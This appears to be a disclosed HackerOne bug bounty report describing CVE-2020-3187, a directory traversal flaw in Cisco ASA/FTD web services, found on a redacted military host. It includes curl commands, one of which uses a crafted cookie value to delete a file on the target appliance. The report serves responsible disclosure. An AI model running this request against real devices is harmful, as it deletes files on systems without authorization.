CVE-2020-3187 - Unauthenticated Arbitrary File Deletion
Critical
Vulnerability Details
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences.
The IP has a SSL certificate pointing to .█████
curl -kv https://█████████/
output
```
Server certificate:
* subject: █████████.mil
```
## Impact
An exploit could allow the attacker to view or delete arbitrary files on the targeted system. When the device is reloaded after exploitation of this vulnerability, any files that were deleted are restored. The attacker can only view and delete files within the web services file system. This file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability can not be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. Reloading the affected device will restore all files within the web services file system.
## System Host(s)
█████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2020-3187
## Steps to Reproduce
1.First I performed a curl request to validate that /session_password.html gave a 200 response.
curl -k -s -i https://███/+CSCOE+/session_password.html
2.Example to delete logo file "/+CSCOU+/csco_logo.gif".
curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://██████/+CSCOE+/session_password.html
_NOTE: No destructive behavior was performed on target, the above command will remove csco_logo.gif and can be restored on reboot of the device_
## Suggested Mitigation/Remediation Actions
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43
Actions
View on HackerOneReport Stats
- Report ID: 1555027
- State: Closed
- Substate: resolved
- Upvotes: 5